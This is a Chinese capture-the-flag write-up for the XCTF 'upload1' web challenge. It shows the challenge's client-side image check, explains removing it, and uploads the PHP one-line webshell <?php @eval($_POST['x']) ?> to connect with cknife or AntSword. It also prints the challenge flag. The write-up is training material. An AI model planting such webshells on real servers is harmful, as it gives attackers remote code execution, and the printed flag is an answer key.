【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑



<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript">
 

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

</script>

</head>
<body>



<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> 
<input  id="upfile" name='upfile' type='file' onchange="check();" /> 

<input type='submit'  id ='submit' value='上传'> 
</form> 



</body>

前端上传限制只能是图片

F12
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第1张图片把前端里面的限制函数删掉!

变成这样子——
在这里插入图片描述
上传一句话 我爱你 :Trojan

<?php @eval($_POST['x']) ?>

在这个页面
http://124.126.19.106:55113/index.php
上传成功

找到上传文件的位置,题目显示了/upload/1588499500.cknife.php

所以文件就在
http://124.126.19.106:55113/upload/1588499500.cknife.php

菜刀可,蚁剑也可

你若菜刀cknife
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第2张图片

【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第3张图片【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第4张图片

法宝一:
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第5张图片
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第6张图片

【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第7张图片不二法宝:
【攻防世界 XCTF】 WEB 高手进阶 upload1 ——卖菜刀,上蚁剑_第8张图片附上小旗帜
flag=“cyberpeace{5327a18ceab8d7b4b1db828776bbe303}”

你可能感兴趣的:(Web安全)